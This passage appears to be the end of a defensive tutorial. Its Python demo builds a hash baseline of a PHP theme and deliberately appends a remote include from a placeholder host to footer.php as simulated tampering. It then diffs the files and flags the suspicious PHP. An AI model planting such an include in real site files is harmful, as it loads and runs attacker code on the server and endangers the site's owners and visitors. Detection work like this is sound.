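        baseline = build_baseline(root)   # in practice: store this off the web host

        # Constructed tampering: a remote include appended to the footer template.
        with open(os.path.join(theme, "footer.php"), "a") as f:
            f.write("<?php @include('http://example.invalid/x.txt'); ?>\n")

        changes = diff_baseline(root, baseline)
        flagged = {p: suspicious_php(os.path.join(root, p))
                   for p in changes["added"] + changes["modified"]}
        return changes, flagged


if __name__ == "__main__":
    changes, flagged = demo()
    print("changed files:", changes)
    print("indicator hits:", flagged)
```

Keep the baseline somewhere the web server's user cannot write, because whatever injected the PHP runs with that user's rights and could just as easily rewrite a hash file sitting next to the theme. A clean diff on a compromised host is also only as good as the baseline: take it from a fresh copy of the theme, not from the tree after a manual cleanup.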